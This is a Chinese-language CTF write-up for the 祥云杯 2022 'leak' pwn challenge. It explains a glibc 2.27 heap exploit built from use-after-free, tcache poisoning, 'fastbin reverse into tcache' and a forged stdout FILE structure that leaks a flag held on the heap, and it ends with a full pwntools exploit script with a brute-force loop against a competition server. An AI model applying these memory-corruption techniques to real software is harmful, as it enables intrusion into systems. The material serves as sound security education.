DDR爱好者之家 Design By 杰米

祥云杯做到一道出的还挺好的题目,而且学了较多的利用思路,特此记录。leak.zip

<!--more-->

文件分析

这一题呢,是一道经典的 2.27 1.6 版本的堆题,实现了增删改的功能,没有查,4,5两个选项目测是摆设,在题目的一开始,把 flag 的内容读到了堆上,delete 操作存在 uaf 漏洞

思路分析

这题它主要是没有 IO 函数,所以 IO 结构体一直没有初始化。但是这里小知识点来了:我们只要把 stdout 的 flag 设置为 0xfbad1800,然后再 exit,它就会输出 IO_write_base 到 IO_write_ptr 俩指针中间的内容,并且它是逐字节打印的,只有尝试打印不可读的内存的时候才会崩溃,只要 IO_write_base 往后还有可读内存,它就一定能打印这些信息。

这个知识其实是 IO 里面的,是当时 fmyy 师傅给我的提示,于是我们的思路就是构造合理的 IO 结构体,然后 IO_write_base 改成 堆的地址,flag 和 IO_write_ptr 改成合理的内范围就可以泄露堆上面的内容了,如图所示:

祥云杯2022-leak Writeup

所以我们的思路是要往 IO 这里写一个堆地址,然后可能还需要再劫持一个指针过去能任意写,至少需要 0x30 的写空间。

然后其实就是写堆地址比较困难了,因为我们根本没有办法泄露堆地址,所以需要用其它的思路,这里肥猫师傅给我的思路就是 fastbin reverse into tcache,当然还有其它的不过我得先学学。

fastbin reverse into tcache

这个利用手法就是需要存在 uaf。然后我们在构造一个 fastbin,将 fastbin 的 fd 改成 target,再把 tcache 中对应大小的堆块数量改得小于7,我们此时再申请一个这个大小的 fast bin就能直接将堆的地址写到 target + 0x18 的位置处。

这里我们可以分析一下它的行为:

因为 glibc 认为 fastbin 中如果还有数据且 tcache 数据不满的情况,我们就会将 fastbin 中剩下的数据取出放入 tcache 当中。这里还需要注意,这个版本的 tcache 已经有了两个字段,它已经变成了双链表,检查也更多了,没有之前那么脆弱,但是需要用到这个利用,还得它是双链表,单链表用不起来的。

那么这个 tcache 对应的 bin 每个 size 都有一个 fd 和 bk。而我们 fastbin 链入 tcache 大概就是

fastbin->fd=tcache[size]->fdfastbin->bk=&tcache[size]tcache[size]->fd=fastbin

那么我们看到这里有一个行为是 fastbin->bk=&tcache[size]。而在 2.27 1.4版本以前(不包括)是没有这句话的,因为它tcache 都没有 bk 指针。所以这里我们可以任意写一个堆地址,这就是 fastbin reverse into tcache 的利用思路。

uaf的利用

这里 uaf 并不能直接 double free,因为这个版本开始检测了 double free,并且是遍历检测,他只要在 tcache 中发现有相同的指针直接给你输出一句 corruption。

但是这里我们能 add 的次数是有限的,所以本着非必要不 add 的原则我们还是能省则省。

我们先构造一个 unsorted bin,然后利用堆重叠的思路,在上面构造两个 size 的 bin,一个只需要用 tcache 即可,还有一个要构造出 fastbin才行。

我们先布局一下:

交互函数:

def choice(ch):    p.sendlineafter(b'Your choice: ',str(ch))def Index(index):    p.sendlineafter(b'Index: ',str(index))def INDEX(index):    p.sendlineafter(b'index: ',str(index))def add(index,size):    choice(1)    Index(index)    p.sendlineafter(b'Size: ',str(size))def edit(index,content):    choice(2)    Index(index)    p.sendafter(b'Content: ',content)def de(index1,index2):    choice(4)    INDEX(index1)    INDEX(index2)def free(index):    choice(3)    Index(index)

构造 0 1 两个 chunk 互刷,填满 tcache。

再用 1,2 两个 chunk 去 free 得到两个 fastbin,这里应该用一个就可以了的。。因为我们 fast bin 后面 fd 可以伪造。

add(0,0x30)add(1,0x30)add(4,0x20)add(2,0x30)for  i in range(3):free(0)edit(0,p64(0))free(1)edit(1,p64(0))free(0)edit(0,p64(0))free(1)free(2)

祥云杯2022-leak Writeup

我们主要就是针对这个 340 的堆块进行堆重叠。

也就是图中的 fastbin

祥云杯2022-leak Writeup

然后我们 tcache 劫持一个 堆块到 340 的位置方便我们修改这个 size。这个时候我们需要提前布局好,我们改成 unsorted bin 之后会有多大,下面我们再分配一个 0x90 的堆块和这个一加起来就是 0xd0。所以unsorted bin 我们伪造 0xd0。

因为 fastbin 的存在会触发 malloc_consolidate 函数,所以我们这里删除了 fastbin,等接下来再构造。

add(0,0x30)add(1,0x30)add(4,0x20)add(2,0x30)for  i in range(3):    free(0)    edit(0,p64(0))    free(1)    edit(1,p64(0))free(0)edit(0,p64(0))add(3,0x90)add(5,0x20)add(8,0xd0)add(9,0x50)free(4)free(5)edit(5,'\x40')

后面再进行一次布局,然后 uaf 改指针的低位为 \x40 字节。

此时一个 tcache chunk 的 fd 指向了我们要伪造的堆块的地址。

祥云杯2022-leak Writeup

再把两个堆块取出来,然后取出的第二个堆块就是我们重叠的 可以改 size 的块。

add(0,0x30)add(1,0x30)add(4,0x20)add(2,0x30)for  i in range(3):    free(0)    edit(0,p64(0))    free(1)    edit(1,p64(0))free(0)edit(0,p64(0))add(3,0x90)add(5,0x20)add(8,0xd0)add(9,0x50)free(4)free(5)edit(5,'\x40')add(6,0x20)add(7,0x20)edit(7,p64(0x6161616161616161)+p64(0x41))free(1)free(2)edit(7,p64(0x65656565)+p64(0x61))free(9)free(2)edit(7,p64(0x65656565)+p64(0xe1))

到这里我们就完成了 tcache 的构造,和 fastbin 的构造。

祥云杯2022-leak Writeup

然后我们就应该这个伪造的 0xe0 的堆块和我们之前布局的一个 0xe0 的堆块互刷产生 unsorted bin,带上 libc 的地址,然后改掉低两个字节去 stdout那边。

add(0,0x30)add(1,0x30)add(4,0x20)add(2,0x30)for  i in range(3):    free(0)    edit(0,p64(0))    free(1)    edit(1,p64(0))free(0)edit(0,p64(0))add(3,0x90)add(5,0x20)add(8,0xd0)add(9,0x50)free(4)free(5)edit(5,'\x40')add(6,0x20)add(7,0x20)edit(7,p64(0x6161616161616161)+p64(0x41))free(1)free(2)edit(7,p64(0x65656565)+p64(0x61))free(9)free(2)edit(7,p64(0x65656565)+p64(0xe1))for i in range(3):    free(8)    edit(8,p64(0))    free(2)    edit(2,p64(0))free(8)edit(8,p64(0))free(2)edit(7,p64(0x65656565)+p64(0x41)+b'\x60\xe7')add(11,0x50)add(10,0x50)edit(10,p64(0xfbad1800)+p64(0)*4+p64(0x5fffffffffff))

这里用我们伪造的 0x60 的堆块去 stdout 改掉了 flag 和 IO_write_ptr。

祥云杯2022-leak Writeup

最后再把 地址改成 768,也就是 IO_read_ptr 的地址,因为这样的话就会去执行

fastbin->bk=&tcache[size]

的时候就会给 768+0x18(fast bin 的 bk 是在+0x18的位置)的位置写上 tcache bin 的地址。

我们刚刚那个情况的堆块情况是这样的:

祥云杯2022-leak Writeup

然后我们把这个 fd 再改了,然后 add 一个 0x40 的堆块,会把 tcache 中的堆块取出来,tcache bin不为满且 tcache bin 的指针为 NULL。我们再次取 0x40 的堆块就会取 fastbin,然后判断 fastbin 不为空,把这个 340 堆块的 fd 当作 fastbin 放入 tcache 当中,触发 fastbin reverse into tcache,在 IO_write_base 上写入地址。

最后我们成功构造出 IO 结构体

祥云杯2022-leak Writeup

然后选择选项 6 exit输出一大堆内容,我们直接用终端的搜索可以找到 flag,这里需要爆破 半个字节去找到 stdout。

祥云杯2022-leak Writeup

来看看冤种选手赛后出题

祥云杯2022-leak Writeup

最终exp

from pwn import *context.log_level='debug'file='./leak'elf=ELF(file)libc=ELF('./libc/libc-2.27-64.so')#p=process(file)def pwn():    p=remote('101.201.71.136', 20783)    def choice(ch):        p.sendlineafter(b'Your choice: ',str(ch))    def Index(index):        p.sendlineafter(b'Index: ',str(index))    def INDEX(index):        p.sendlineafter(b'index: ',str(index))    def add(index,size):        choice(1)        Index(index)        p.sendlineafter(b'Size: ',str(size))    def edit(index,content):        choice(2)        Index(index)        p.sendafter(b'Content: ',content)    def de(index1,index2):        choice(4)        INDEX(index1)        INDEX(index2)    def free(index):        choice(3)        Index(index)    add(0,0x30)    add(1,0x30)    add(4,0x20)    add(2,0x30)    for  i in range(3):        free(0)        edit(0,p64(0))        free(1)        edit(1,p64(0))    free(0)    edit(0,p64(0))    #free(1)    #free(2)    add(3,0x90)    add(5,0x20)    add(8,0xd0)    add(9,0x50)    free(4)    free(5)    edit(5,'\x40')    add(6,0x20)    add(7,0x20)    edit(7,p64(0x6161616161616161)+p64(0x41))    free(1)    free(2)    edit(7,p64(0x65656565)+p64(0x61))    free(9)    free(2)    edit(7,p64(0x65656565)+p64(0xe1))    for i in range(3):        free(8)        edit(8,p64(0))        free(2)        edit(2,p64(0))    free(8)    edit(8,p64(0))    free(2)    edit(7,p64(0x65656565)+p64(0x41)+b'\x60\xe7')    add(11,0x50)    add(10,0x50)    edit(10,p64(0xfbad1800)+p64(0)*4+p64(0x5fffffffffff))    edit(2,'\x68\xe7')    add(12,0x30)    add(13,0x30)    #gdb.attach(p)    p.interactive()while True:       try:        pwn()    except:        continue    break